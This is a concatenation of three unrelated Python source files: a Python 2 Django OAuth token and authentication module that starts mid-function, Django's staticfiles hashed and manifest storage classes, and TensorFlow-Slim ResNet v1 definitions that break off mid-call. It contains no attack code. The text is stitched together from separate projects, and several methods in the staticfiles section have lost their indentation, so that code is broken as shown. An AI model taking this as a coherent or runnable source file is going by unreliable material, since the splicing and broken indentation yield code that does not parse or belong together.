    if oauth_request is None:
        return INVALID_PARAMS_RESPONSE
    try:
        token = oauth_server.fetch_request_token(oauth_request)
    except oauth.OAuthError, err:
        return send_oauth_error(err)
    try:
        callback = oauth_server.get_callback(oauth_request)
    except:
        # No callback supplied with the request.
        callback = None
    if request.method == "GET":
        params = oauth_request.get_normalized_parameters()
        oauth_view = getattr(settings, 'OAUTH_AUTH_VIEW', None)
        if oauth_view is None:
            return oauth_auth_view(request, token, callback, params)
        else:
            return get_callable(oauth_view)(request, token, callback, params)
    elif request.method == "POST":
        try:
            form = forms.OAuthAuthenticationForm(request.POST)
            if form.is_valid():
                token = oauth_server.authorize_token(token, request.user)
                args = '?'+token.to_string(only_key=True)
            else:
                args = '?error=%s' % 'Access not granted by user.'
            if not callback:
                # No request callback: hand off to the configured view.
                # Raises AttributeError if OAUTH_CALLBACK_VIEW is unset.
                callback = getattr(settings, 'OAUTH_CALLBACK_VIEW')
                return get_callable(callback)(request, token)
            # Reached only when the request itself supplied a callback URL.
            response = HttpResponseRedirect(callback+args)
        except oauth.OAuthError, err:
            response = send_oauth_error(err)
    else:
        response = HttpResponse('Action not allowed.')
    return response
def oauth_access_token(request):
    """Access-token endpoint: exchange an authorized request token for an
    access token."""
    oauth_server, oauth_request = initialize_server_request(request)
    if oauth_request is None:
        return INVALID_PARAMS_RESPONSE
    try:
        token = oauth_server.fetch_access_token(oauth_request)
        return HttpResponse(token.to_string())
    except oauth.OAuthError, err:
        return send_oauth_error(err)
# Canned 401 returned whenever the OAuth parameters cannot be parsed.
INVALID_PARAMS_RESPONSE = send_oauth_error(oauth.OAuthError('Invalid request parameters.'))
class OAuthAuthentication(object):
    """
    OAuth authentication. Based on work by Leah Culver.
    """
    def __init__(self, realm='API'):
        self.realm = realm
        self.builder = oauth.build_authenticate_header
    def is_authenticated(self, request):
        """
        Checks whether a means of specifying authentication
        is provided, and if so, if it is a valid token.

        Read the documentation on `HttpBasicAuthentication`
        for more information about what goes on here.
        """
        if self.is_valid_request(request):
            try:
                consumer, token, parameters = self.validate_token(request)
            except oauth.OAuthError, err:
                # Python 2 print statement: dumps the error response to stdout.
                print send_oauth_error(err)
                return False
            if consumer and token:
                # Attach the token's user and a throttle key to the request.
                request.user = token.user
                request.throttle_extra = token.consumer.id
                return True
        return False
    def challenge(self):
        """
        Returns a 401 response with a small bit on
        what OAuth is, and where to learn more about it.

        When this was written, browsers did not understand
        OAuth authentication on the browser side, and hence
        the helpful template we render. Maybe some day in the
        future, browsers will take care of this stuff for us
        and understand the 401 with the realm we give it.
        """
        response = HttpResponse()
        response.status_code = 401
        realm = 'API'
        for k, v in self.builder(realm=realm).iteritems():
            response[k] = v
        tmpl = loader.render_to_string('oauth/challenge.html',
            { 'MEDIA_URL': settings.MEDIA_URL })
        response.content = tmpl
        return response
    @staticmethod
    def is_valid_request(request):
        """
        Checks whether the required parameters are either in
        the http-authorization header sent by some clients,
        which is by the way the preferred method according to
        OAuth spec, but otherwise fall back to `GET` and `POST`.
        """
        must_have = [ 'oauth_'+s for s in [
            'consumer_key', 'token', 'signature',
            'signature_method', 'timestamp', 'nonce' ] ]
        # Substring/containment test: checks presence of the parameter
        # names only, not the validity of their values.
        is_in = lambda l: all([ (p in l) for p in must_have ])
        auth_params = request.META.get("HTTP_AUTHORIZATION", "")
        req_params = request.REQUEST
        return is_in(auth_params) or is_in(req_params)
    @staticmethod
    def validate_token(request, check_timestamp=True, check_nonce=True):
        # check_timestamp/check_nonce are accepted but not forwarded;
        # verification is delegated entirely to the OAuth server.
        oauth_server, oauth_request = initialize_server_request(request)
        return oauth_server.verify_request(oauth_request)
| |
import hashlib
import json
import os
import posixpath
import re
from urllib.parse import unquote, urldefrag, urlsplit, urlunsplit
from django.conf import settings
from django.contrib.staticfiles.utils import check_settings, matches_patterns
from django.core.exceptions import ImproperlyConfigured
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.utils.functional import LazyObject
class StaticFilesStorage(FileSystemStorage):
    """
    Standard file system storage for static files.

    ``location`` defaults to ``STATIC_ROOT`` and ``base_url`` to
    ``STATIC_URL``.
    """
    def __init__(self, location=None, base_url=None, *args, **kwargs):
        location = settings.STATIC_ROOT if location is None else location
        base_url = settings.STATIC_URL if base_url is None else base_url
        check_settings(base_url)
        super().__init__(location, base_url, *args, **kwargs)
        if not location:
            # FileSystemStorage falls back to MEDIA_ROOT when location is
            # empty; undo that so the misconfiguration surfaces in path().
            self.base_location = None
            self.location = None

    def path(self, name):
        if self.location:
            return super().path(name)
        raise ImproperlyConfigured("You're using the staticfiles app "
                                   "without having set the STATIC_ROOT "
                                   "setting to a filesystem path.")
class HashedFilesMixin:
    """Storage mixin that renames static files to include a content hash
    and rewrites CSS/JS references to point at the hashed names."""
    # Fallback substitution template used when a pattern supplies none.
    default_template = """url("%(url)s")"""
    # Upper bound on substitution passes before post_process gives up.
    max_post_process_passes = 5
    # (glob, rules) pairs; each rule is either a bare regex (paired with
    # default_template) or a (regex, template) tuple. The regexes capture
    # the full reference as 'matched' and the referenced path as 'url'.
    patterns = (
        ("*.css", (
            r"""(?P<matched>url\(['"]{0,1}\s*(?P<url>.*?)["']{0,1}\))""",
            (
                r"""(?P<matched>@import\s*["']\s*(?P<url>.*?)["'])""",
                """@import url("%(url)s")""",
            ),
        )),
        ('*.js', (
            (
                r'(?P<matched>)^(//# (?-i:sourceMappingURL)=(?P<url>.*))$',
                '//# sourceMappingURL=%(url)s',
            ),
            (
                r"""(?P<matched>import\s+(?s:(?P<imports>.*?))\s*from\s*["'](?P<url>.*?)["'])""",
                'import %(imports)s from "%(url)s"',
            ),
            (
                r"""(?P<matched>export\s+(?s:(?P<exports>.*?))\s*from\s*["'](?P<url>.*?)["'])""",
                'export %(exports)s from "%(url)s"',
            ),
            (r"""(?P<matched>import\(["'](?P<url>.*?)["']\))""", 'import("%(url)s")'),
        )),
    )
    # Whether single-pass intermediate hashed files are kept on disk.
    keep_intermediate_files = True
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._patterns = {}
self.hashed_files = {}
for extension, patterns in self.patterns:
for pattern in patterns:
if isinstance(pattern, (tuple, list)):
pattern, template = pattern
else:
template = self.default_template
compiled = re.compile(pattern, re.IGNORECASE)
self._patterns.setdefault(extension, []).append((compiled, template))
def file_hash(self, name, content=None):
"""
Return a hash of the file with the given name and optional content.
"""
if content is None:
return None
md5 = hashlib.md5()
for chunk in content.chunks():
md5.update(chunk)
return md5.hexdigest()[:12]
    def hashed_name(self, name, content=None, filename=None):
        """Return ``name`` rewritten as ``root.<hash>.ext``.

        `filename` is the name of file to hash if `content` isn't given.
        `name` is the base name to construct the new hashed filename from.
        """
        parsed_name = urlsplit(unquote(name))
        clean_name = parsed_name.path.strip()
        filename = (filename and urlsplit(unquote(filename)).path.strip()) or clean_name
        opened = content is None
        if opened:
            # No content supplied: open the file from this storage.
            if not self.exists(filename):
                raise ValueError("The file '%s' could not be found with %r." % (filename, self))
            try:
                content = self.open(filename)
            except OSError:
                # Handle directory paths and fragments
                return name
        try:
            file_hash = self.file_hash(clean_name, content)
        finally:
            # Only close what we opened ourselves.
            if opened:
                content.close()
        path, filename = os.path.split(clean_name)
        root, ext = os.path.splitext(filename)
        # Splice the hash between the root and the extension.
        file_hash = ('.%s' % file_hash) if file_hash else ''
        hashed_name = os.path.join(path, "%s%s%s" %
                                   (root, file_hash, ext))
        unparsed_name = list(parsed_name)
        unparsed_name[2] = hashed_name
        # Special casing for a @font-face hack, like url(myfont.eot?#iefix")
        # http://www.fontspring.com/blog/the-new-bulletproof-font-face-syntax
        if '?#' in name and not unparsed_name[3]:
            unparsed_name[2] += '?'
        return urlunsplit(unparsed_name)
    def _url(self, hashed_name_func, name, force=False, hashed_files=None):
        """
        Return the URL for ``name``, rewritten to its hashed form via
        ``hashed_name_func``. In DEBUG mode (unless ``force``) the
        non-hashed URL is returned instead.
        """
        if settings.DEBUG and not force:
            hashed_name, fragment = name, ''
        else:
            clean_name, fragment = urldefrag(name)
            if urlsplit(clean_name).path.endswith('/'):  # don't hash paths
                hashed_name = name
            else:
                args = (clean_name,)
                if hashed_files is not None:
                    args += (hashed_files,)
                hashed_name = hashed_name_func(*args)
        final_url = super().url(hashed_name)
        # Special casing for a @font-face hack, like url(myfont.eot?#iefix")
        # http://www.fontspring.com/blog/the-new-bulletproof-font-face-syntax
        query_fragment = '?#' in name  # [sic!]
        if fragment or query_fragment:
            urlparts = list(urlsplit(final_url))
            if fragment and not urlparts[4]:
                urlparts[4] = fragment
            if query_fragment and not urlparts[3]:
                urlparts[2] += '?'
            final_url = urlunsplit(urlparts)
        return unquote(final_url)
def url(self, name, force=False):
"""
Return the non-hashed URL in DEBUG mode.
"""
return self._url(self.stored_name, name, force)
    def url_converter(self, name, hashed_files, template=None):
        """
        Return the custom URL converter for the given file name.

        The returned callable is a ``re.sub`` replacement function that
        maps each matched reference inside ``name`` to its hashed form.
        """
        if template is None:
            template = self.default_template
        def converter(matchobj):
            """
            Convert the matched URL to a normalized and hashed URL.

            This requires figuring out which files the matched URL resolves
            to and calling the url() method of the storage.
            """
            matches = matchobj.groupdict()
            matched = matches['matched']
            url = matches['url']
            # Ignore absolute/protocol-relative and data-uri URLs.
            if re.match(r'^[a-z]+:', url):
                return matched
            # Ignore absolute URLs that don't point to a static file (dynamic
            # CSS / JS?). Note that STATIC_URL cannot be empty.
            if url.startswith('/') and not url.startswith(settings.STATIC_URL):
                return matched
            # Strip off the fragment so a path-like fragment won't interfere.
            url_path, fragment = urldefrag(url)
            if url_path.startswith('/'):
                # Otherwise the condition above would have returned prematurely.
                assert url_path.startswith(settings.STATIC_URL)
                target_name = url_path[len(settings.STATIC_URL):]
            else:
                # We're using the posixpath module to mix paths and URLs conveniently.
                source_name = name if os.sep == '/' else name.replace(os.sep, '/')
                target_name = posixpath.join(posixpath.dirname(source_name), url_path)
            # Determine the hashed name of the target file with the storage backend.
            hashed_url = self._url(
                self._stored_name, unquote(target_name),
                force=True, hashed_files=hashed_files,
            )
            # Keep the original directory part; swap in the hashed basename.
            transformed_url = '/'.join(url_path.split('/')[:-1] + hashed_url.split('/')[-1:])
            # Restore the fragment that was stripped off earlier.
            if fragment:
                transformed_url += ('?#' if '?#' in url else '#') + fragment
            # Return the hashed version to the file
            matches['url'] = unquote(transformed_url)
            return template % matches
        return converter
    def post_process(self, paths, dry_run=False, **options):
        """
        Post process the given dictionary of files (called from collectstatic).

        Processing is actually two separate operations:

        1. renaming files to include a hash of their content for cache-busting,
           and copying those files to the target storage.
        2. adjusting files which contain references to other files so they
           refer to the cache-busting filenames.

        If either of these are performed on a file, then that file is considered
        post-processed.

        Yields (original_path, processed_path, processed) tuples, where
        ``processed`` may be an Exception describing a failure.
        """
        # don't even dare to process the files if we're in dry run mode
        if dry_run:
            return
        # where to store the new paths
        hashed_files = {}
        # build a list of adjustable files
        adjustable_paths = [
            path for path in paths
            if matches_patterns(path, self._patterns)
        ]
        # Adjustable files to yield at end, keyed by the original path.
        processed_adjustable_paths = {}
        # Do a single pass first. Post-process all files once, yielding not
        # adjustable files and exceptions, and collecting adjustable files.
        for name, hashed_name, processed, _ in self._post_process(paths, adjustable_paths, hashed_files):
            if name not in adjustable_paths or isinstance(processed, Exception):
                yield name, hashed_name, processed
            else:
                processed_adjustable_paths[name] = (name, hashed_name, processed)
        paths = {path: paths[path] for path in adjustable_paths}
        substitutions = False
        # Re-run substitution until the hashes converge or the pass limit
        # (max_post_process_passes) is reached.
        for i in range(self.max_post_process_passes):
            substitutions = False
            for name, hashed_name, processed, subst in self._post_process(paths, adjustable_paths, hashed_files):
                # Overwrite since hashed_name may be newer.
                processed_adjustable_paths[name] = (name, hashed_name, processed)
                substitutions = substitutions or subst
            if not substitutions:
                break
        if substitutions:
            yield 'All', None, RuntimeError('Max post-process passes exceeded.')
        # Store the processed paths
        self.hashed_files.update(hashed_files)
        # Yield adjustable files with final, hashed name.
        yield from processed_adjustable_paths.values()
    def _post_process(self, paths, adjustable_paths, hashed_files):
        """
        Run one hashing/substitution pass over *paths*.

        Yields ``(name, hashed_name, processed, substitutions)`` tuples;
        ``processed`` may be an Exception when a URL replacement failed, and
        ``substitutions`` reports whether the file's hash changed this pass.
        """
        # Sort the files by directory level
        def path_level(name):
            return len(name.split(os.sep))
        for name in sorted(paths, key=path_level, reverse=True):
            substitutions = True
            # use the original, local file, not the copied-but-unprocessed
            # file, which might be somewhere far away, like S3
            storage, path = paths[name]
            with storage.open(path) as original_file:
                cleaned_name = self.clean_name(name)
                hash_key = self.hash_key(cleaned_name)
                # generate the hash with the original content, even for
                # adjustable files.
                if hash_key not in hashed_files:
                    hashed_name = self.hashed_name(name, original_file)
                else:
                    hashed_name = hashed_files[hash_key]
                # then get the original's file content..
                if hasattr(original_file, 'seek'):
                    original_file.seek(0)
                hashed_file_exists = self.exists(hashed_name)
                processed = False
                # ..to apply each replacement pattern to the content
                if name in adjustable_paths:
                    old_hashed_name = hashed_name
                    content = original_file.read().decode('utf-8')
                    for extension, patterns in self._patterns.items():
                        if matches_patterns(path, (extension,)):
                            for pattern, template in patterns:
                                converter = self.url_converter(name, hashed_files, template)
                                try:
                                    content = pattern.sub(converter, content)
                                except ValueError as exc:
                                    # Surface the failure but keep processing
                                    # the remaining patterns/files.
                                    yield name, None, exc, False
                    if hashed_file_exists:
                        self.delete(hashed_name)
                    # then save the processed result
                    content_file = ContentFile(content.encode())
                    if self.keep_intermediate_files:
                        # Save intermediate file for reference
                        self._save(hashed_name, content_file)
                    # Re-hash from the substituted content: rewriting URLs
                    # changed the bytes, so the old hash no longer applies.
                    hashed_name = self.hashed_name(name, content_file)
                    if self.exists(hashed_name):
                        self.delete(hashed_name)
                    saved_name = self._save(hashed_name, content_file)
                    hashed_name = self.clean_name(saved_name)
                    # If the file hash stayed the same, this file didn't change
                    if old_hashed_name == hashed_name:
                        substitutions = False
                    processed = True
                if not processed:
                    # or handle the case in which neither processing nor
                    # a change to the original file happened
                    if not hashed_file_exists:
                        processed = True
                        saved_name = self._save(hashed_name, original_file)
                        hashed_name = self.clean_name(saved_name)
                # and then set the cache accordingly
                hashed_files[hash_key] = hashed_name
                yield name, hashed_name, processed, substitutions
def clean_name(self, name):
return name.replace('\\', '/')
def hash_key(self, name):
return name
def _stored_name(self, name, hashed_files):
# Normalize the path to avoid multiple names for the same file like
# ../foo/bar.css and ../foo/../foo/bar.css which normalize to the same
# path.
name = posixpath.normpath(name)
cleaned_name = self.clean_name(name)
hash_key = self.hash_key(cleaned_name)
cache_name = hashed_files.get(hash_key)
if cache_name is None:
cache_name = self.clean_name(self.hashed_name(name))
return cache_name
    def stored_name(self, name):
        """
        Return the final hashed name for *name*, preferring the in-memory
        cache and otherwise recomputing it from the files on disk.
        """
        cleaned_name = self.clean_name(name)
        hash_key = self.hash_key(cleaned_name)
        cache_name = self.hashed_files.get(hash_key)
        if cache_name:
            return cache_name
        # No cached name found, recalculate it from the files.
        intermediate_name = name
        # An adjustable file's hash changes whenever the references inside it
        # are rewritten, so follow the chain of intermediate names until it
        # stabilizes (mirrors the multiple passes of post_process()).
        for i in range(self.max_post_process_passes + 1):
            cache_name = self.clean_name(
                self.hashed_name(name, content=None, filename=intermediate_name)
            )
            if intermediate_name == cache_name:
                # Store the hashed name if there was a miss.
                self.hashed_files[hash_key] = cache_name
                return cache_name
            else:
                # Move on to the next intermediate file.
                intermediate_name = cache_name
        # If the cache name can't be determined after the max number of passes,
        # the intermediate files on disk may be corrupt; avoid an infinite loop.
        raise ValueError("The name '%s' could not be hashed with %r." % (name, self))
class ManifestFilesMixin(HashedFilesMixin):
    """
    Mixin that persists the original-name -> hashed-name mapping in a JSON
    manifest file stored alongside the collected static files.
    """
    manifest_version = '1.0'  # the manifest format standard
    manifest_name = 'staticfiles.json'
    # When True, looking up a file missing from the manifest raises ValueError.
    manifest_strict = True
    # Intermediate (pre-substitution) hashed files are not kept by default.
    keep_intermediate_files = False
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Prime the in-memory map from the manifest written by a previous run.
        self.hashed_files = self.load_manifest()
    def read_manifest(self):
        """Return the raw manifest text, or None when no manifest exists."""
        try:
            with self.open(self.manifest_name) as manifest:
                return manifest.read().decode()
        except FileNotFoundError:
            return None
    def load_manifest(self):
        """Parse the manifest and return its paths mapping ({} when absent)."""
        content = self.read_manifest()
        if content is None:
            return {}
        try:
            stored = json.loads(content)
        except json.JSONDecodeError:
            pass
        else:
            version = stored.get('version')
            if version == '1.0':
                return stored.get('paths', {})
        # Both unparsable JSON and an unrecognized version end up here.
        raise ValueError("Couldn't load manifest '%s' (version %s)" %
                         (self.manifest_name, self.manifest_version))
    def post_process(self, *args, **kwargs):
        # Start from a clean slate so stale entries don't survive this run.
        self.hashed_files = {}
        yield from super().post_process(*args, **kwargs)
        if not kwargs.get('dry_run'):
            self.save_manifest()
    def save_manifest(self):
        """Serialize the current hashed-files mapping to the JSON manifest."""
        payload = {'paths': self.hashed_files, 'version': self.manifest_version}
        if self.exists(self.manifest_name):
            self.delete(self.manifest_name)
        contents = json.dumps(payload).encode()
        self._save(self.manifest_name, ContentFile(contents))
    def stored_name(self, name):
        """Map *name* (possibly carrying a query/fragment) to its hashed name."""
        parsed_name = urlsplit(unquote(name))
        clean_name = parsed_name.path.strip()
        hash_key = self.hash_key(clean_name)
        cache_name = self.hashed_files.get(hash_key)
        if cache_name is None:
            if self.manifest_strict:
                raise ValueError("Missing staticfiles manifest entry for '%s'" % clean_name)
            cache_name = self.clean_name(self.hashed_name(name))
        unparsed_name = list(parsed_name)
        unparsed_name[2] = cache_name
        # Special casing for a @font-face hack, like url(myfont.eot?#iefix")
        # http://www.fontspring.com/blog/the-new-bulletproof-font-face-syntax
        if '?#' in name and not unparsed_name[3]:
            unparsed_name[2] += '?'
        return urlunsplit(unparsed_name)
class ManifestStaticFilesStorage(ManifestFilesMixin, StaticFilesStorage):
    """
    File-system static files storage that also writes content-hashed copies
    of every file it saves, tracked in a JSON manifest.
    """
class ConfiguredStorage(LazyObject):
    """Lazily instantiate the storage class named by settings.STATICFILES_STORAGE."""
    def _setup(self):
        # Resolve the dotted path and instantiate only on first access.
        storage_class = get_storage_class(settings.STATICFILES_STORAGE)
        self._wrapped = storage_class()
staticfiles_storage = ConfiguredStorage()
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains definitions for the original form of Residual Networks.
The 'v1' residual networks (ResNets) implemented in this module were proposed
by:
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Deep Residual Learning for Image Recognition. arXiv:1512.03385
Other variants were introduced in:
[2] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Identity Mappings in Deep Residual Networks. arXiv: 1603.05027
The networks defined in this module utilize the bottleneck building block of
[1] with projection shortcuts only for increasing depths. They employ batch
normalization *after* every weight layer. This is the architecture used by
MSRA in the Imagenet and MSCOCO 2016 competition models ResNet-101 and
ResNet-152. See [2; Fig. 1a] for a comparison between the current 'v1'
architecture and the alternative 'v2' architecture of [2] which uses batch
normalization *before* every weight layer in the so-called full pre-activation
units.
Typical use:
from tensorflow.contrib.slim.nets import resnet_v1
ResNet-101 for image classification into 1000 classes:
# inputs has shape [batch, 224, 224, 3]
with slim.arg_scope(resnet_v1.resnet_arg_scope()):
net, end_points = resnet_v1.resnet_v1_101(inputs, 1000, is_training=False)
ResNet-101 for semantic segmentation into 21 classes:
# inputs has shape [batch, 513, 513, 3]
with slim.arg_scope(resnet_v1.resnet_arg_scope()):
net, end_points = resnet_v1.resnet_v1_101(inputs,
21,
is_training=False,
global_pool=False,
output_stride=16)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from models.tensorflow import resnet_utils
# Re-export so callers can use resnet_v1.resnet_arg_scope() directly.
resnet_arg_scope = resnet_utils.resnet_arg_scope
# TF-Slim shorthand used throughout this module.
slim = tf.contrib.slim
@slim.add_arg_scope
def bottleneck(inputs, depth, depth_bottleneck, stride, rate=1,
               outputs_collections=None, scope=None):
  """Bottleneck residual unit variant with BN after convolutions.

  This is the original residual unit proposed in [1]. See Fig. 1(a) of [2] for
  its definition. Note that we use here the bottleneck variant which has an
  extra bottleneck layer.

  When putting together two consecutive ResNet blocks that use this unit, one
  should use stride = 2 in the last unit of the first block.

  Args:
    inputs: A tensor of size [batch, height, width, channels].
    depth: The depth of the ResNet unit output.
    depth_bottleneck: The depth of the bottleneck layers.
    stride: The ResNet unit's stride. Determines the amount of downsampling of
      the units output compared to its input.
    rate: An integer, rate for atrous convolution.
    outputs_collections: Collection to add the ResNet unit output.
    scope: Optional variable_scope.

  Returns:
    The ResNet unit's output.
  """
  with tf.variable_scope(scope, 'bottleneck_v1', [inputs]) as sc:
    depth_in = slim.utils.last_dimension(inputs.get_shape(), min_rank=4)
    if depth == depth_in:
      # Depth unchanged: identity shortcut, spatially subsampled to match
      # the stride.
      shortcut = resnet_utils.subsample(inputs, stride, 'shortcut')
    else:
      # Depth changes: project with a 1x1 conv (no activation on the
      # shortcut path).
      shortcut = slim.conv2d(inputs, depth, [1, 1], stride=stride,
                             activation_fn=None, scope='shortcut')
    # Bottleneck: 1x1 reduce -> 3x3 (strided/atrous) -> 1x1 expand.
    residual = slim.conv2d(inputs, depth_bottleneck, [1, 1], stride=1,
                           scope='conv1')
    residual = resnet_utils.conv2d_same(residual, depth_bottleneck, 3, stride,
                                        rate=rate, scope='conv2')
    # No activation on the last conv; relu is applied after the addition.
    residual = slim.conv2d(residual, depth, [1, 1], stride=1,
                           activation_fn=None, scope='conv3')
    output = tf.nn.relu(shortcut + residual)
    return slim.utils.collect_named_outputs(outputs_collections,
                                            sc.original_name_scope,
                                            output)
def resnet_v1(inputs,
              blocks,
              num_classes=None,
              is_training=True,
              global_pool=True,
              output_stride=None,
              include_root_block=True,
              spatial_squeeze=True,
              reuse=None,
              scope=None):
  """Generator for v1 ResNet models.

  This function generates a family of ResNet v1 models. See the resnet_v1_*()
  methods for specific model instantiations, obtained by selecting different
  block instantiations that produce ResNets of various depths.

  Training for image classification on Imagenet is usually done with [224, 224]
  inputs, resulting in [7, 7] feature maps at the output of the last ResNet
  block for the ResNets defined in [1] that have nominal stride equal to 32.
  However, for dense prediction tasks we advise that one uses inputs with
  spatial dimensions that are multiples of 32 plus 1, e.g., [321, 321]. In
  this case the feature maps at the ResNet output will have spatial shape
  [(height - 1) / output_stride + 1, (width - 1) / output_stride + 1]
  and corners exactly aligned with the input image corners, which greatly
  facilitates alignment of the features to the image. Using as input [225, 225]
  images results in [8, 8] feature maps at the output of the last ResNet block.

  For dense prediction tasks, the ResNet needs to run in fully-convolutional
  (FCN) mode and global_pool needs to be set to False. The ResNets in [1, 2] all
  have nominal stride equal to 32 and a good choice in FCN mode is to use
  output_stride=16 in order to increase the density of the computed features at
  small computational and memory overhead, cf. http://arxiv.org/abs/1606.00915.

  Args:
    inputs: A tensor of size [batch, height_in, width_in, channels].
    blocks: A list of length equal to the number of ResNet blocks. Each element
      is a resnet_utils.Block object describing the units in the block.
    num_classes: Number of predicted classes for classification tasks. If None
      we return the features before the logit layer.
    is_training: whether is training or not.
    global_pool: If True, we perform global average pooling before computing the
      logits. Set to True for image classification, False for dense prediction.
    output_stride: If None, then the output will be computed at the nominal
      network stride. If output_stride is not None, it specifies the requested
      ratio of input to output spatial resolution.
    include_root_block: If True, include the initial convolution followed by
      max-pooling, if False excludes it.
    spatial_squeeze: if True, logits is of shape [B, C], if false logits is
      of shape [B, 1, 1, C], where B is batch_size and C is number of classes.
    reuse: whether or not the network and its variables should be reused. To be
      able to reuse 'scope' must be given.
    scope: Optional variable_scope.

  Returns:
    net: A rank-4 tensor of size [batch, height_out, width_out, channels_out].
      If global_pool is False, then height_out and width_out are reduced by a
      factor of output_stride compared to the respective height_in and width_in,
      else both height_out and width_out equal one. If num_classes is None, then
      net is the output of the last ResNet block, potentially after global
      average pooling. If num_classes is not None, net contains the pre-softmax
      activations.
    end_points: A dictionary from components of the network to the corresponding
      activation.

  Raises:
    ValueError: If the target output_stride is not valid.
  """
  with tf.variable_scope(scope, 'resnet_v1', [inputs], reuse=reuse) as sc:
    end_points_collection = sc.name + '_end_points'
    with slim.arg_scope([slim.conv2d, bottleneck,
                         resnet_utils.stack_blocks_dense],
                        outputs_collections=end_points_collection):
      with slim.arg_scope([slim.batch_norm], is_training=is_training):
        net = inputs
        if include_root_block:
          if output_stride is not None:
            if output_stride % 4 != 0:
              raise ValueError('The output_stride needs to be a multiple of 4.')
            # The root block already downsamples by 4 (stride-2 conv plus
            # stride-2 max pool), so the remaining blocks only need to
            # supply output_stride / 4.
            output_stride /= 4
          net = resnet_utils.conv2d_same(net, 64, 7, stride=2, scope='conv1')
          net = slim.max_pool2d(net, [3, 3], stride=2, scope='pool1')
        net = resnet_utils.stack_blocks_dense(net, blocks, output_stride)
        if global_pool:
          # Global average pooling.
          net = tf.reduce_mean(net, [1, 2], name='pool5', keep_dims=True)
        if num_classes is not None:
          # 1x1 conv acts as the fully connected logits layer.
          net = slim.conv2d(net, num_classes, [1, 1], activation_fn=None,
                            normalizer_fn=None, scope='logits')
        if spatial_squeeze:
          logits = tf.squeeze(net, [1, 2], name='SpatialSqueeze')
        else:
          logits = net
        # Convert end_points_collection into a dictionary of end_points.
        end_points = slim.utils.convert_collection_to_dict(end_points_collection)
        if num_classes is not None:
          end_points['predictions'] = slim.softmax(logits, scope='predictions')
        return logits, end_points
resnet_v1.default_image_size = 224
def resnet_v1_50(inputs,
                 num_classes=None,
                 is_training=True,
                 global_pool=True,
                 output_stride=None,
                 spatial_squeeze=True,
                 reuse=None,
                 scope='resnet_v1_50'):
  """ResNet-50 model of [1]. See resnet_v1() for arg and return description."""
  # (name, unit depth, bottleneck depth, number of units, last unit's stride).
  block_specs = [
      ('block1', 256, 64, 3, 2),
      ('block2', 512, 128, 4, 2),
      ('block3', 1024, 256, 6, 2),
      ('block4', 2048, 512, 3, 1),
  ]
  blocks = [
      resnet_utils.Block(
          name, bottleneck,
          [(depth, depth_bottleneck, 1)] * (num_units - 1) +
          [(depth, depth_bottleneck, last_stride)])
      for name, depth, depth_bottleneck, num_units, last_stride in block_specs
  ]
  return resnet_v1(inputs, blocks, num_classes, is_training,
                   global_pool=global_pool, output_stride=output_stride,
                   include_root_block=True, spatial_squeeze=spatial_squeeze,
                   reuse=reuse, scope=scope)
resnet_v1_50.default_image_size = resnet_v1.default_image_size
def resnet_v1_101(inputs,
                  num_classes=None,
                  is_training=True,
                  global_pool=True,
                  output_stride=None,
                  spatial_squeeze=True,
                  reuse=None,
                  scope='resnet_v1_101'):
  """ResNet-101 model of [1]. See resnet_v1() for arg and return description."""
  # (name, unit depth, bottleneck depth, number of units, last unit's stride).
  block_specs = [
      ('block1', 256, 64, 3, 2),
      ('block2', 512, 128, 4, 2),
      ('block3', 1024, 256, 23, 2),
      ('block4', 2048, 512, 3, 1),
  ]
  blocks = [
      resnet_utils.Block(
          name, bottleneck,
          [(depth, depth_bottleneck, 1)] * (num_units - 1) +
          [(depth, depth_bottleneck, last_stride)])
      for name, depth, depth_bottleneck, num_units, last_stride in block_specs
  ]
  return resnet_v1(inputs, blocks, num_classes, is_training,
                   global_pool=global_pool, output_stride=output_stride,
                   include_root_block=True, spatial_squeeze=spatial_squeeze,
                   reuse=reuse, scope=scope)
resnet_v1_101.default_image_size = resnet_v1.default_image_size
def resnet_v1_152(inputs,
                  num_classes=None,
                  is_training=True,
                  global_pool=True,
                  output_stride=None,
                  spatial_squeeze=True,
                  reuse=None,
                  scope='resnet_v1_152'):
  """ResNet-152 model of [1]. See resnet_v1() for arg and return description."""
  # (name, unit depth, bottleneck depth, number of units, last unit's stride).
  block_specs = [
      ('block1', 256, 64, 3, 2),
      ('block2', 512, 128, 8, 2),
      ('block3', 1024, 256, 36, 2),
      ('block4', 2048, 512, 3, 1),
  ]
  blocks = [
      resnet_utils.Block(
          name, bottleneck,
          [(depth, depth_bottleneck, 1)] * (num_units - 1) +
          [(depth, depth_bottleneck, last_stride)])
      for name, depth, depth_bottleneck, num_units, last_stride in block_specs
  ]
  return resnet_v1(inputs, blocks, num_classes, is_training,
                   global_pool=global_pool, output_stride=output_stride,
                   include_root_block=True, spatial_squeeze=spatial_squeeze,
                   reuse=reuse, scope=scope)
resnet_v1_152.default_image_size = resnet_v1.default_image_size
def resnet_v1_200(inputs,
                  num_classes=None,
                  is_training=True,
                  global_pool=True,
                  output_stride=None,
                  spatial_squeeze=True,
                  reuse=None,
                  scope='resnet_v1_200'):
  """ResNet-200 model of [2]. See resnet_v1() for arg and return description."""
  # (name, unit depth, bottleneck depth, number of units, last unit's stride).
  block_specs = [
      ('block1', 256, 64, 3, 2),
      ('block2', 512, 128, 24, 2),
      ('block3', 1024, 256, 36, 2),
      ('block4', 2048, 512, 3, 1),
  ]
  blocks = [
      resnet_utils.Block(
          name, bottleneck,
          [(depth, depth_bottleneck, 1)] * (num_units - 1) +
          [(depth, depth_bottleneck, last_stride)])
      for name, depth, depth_bottleneck, num_units, last_stride in block_specs
  ]
  return resnet_v1(inputs, blocks, num_classes, is_training,
                   global_pool=global_pool, output_stride=output_stride,
                   include_root_block=True, spatial_squeeze=spatial_squeeze,
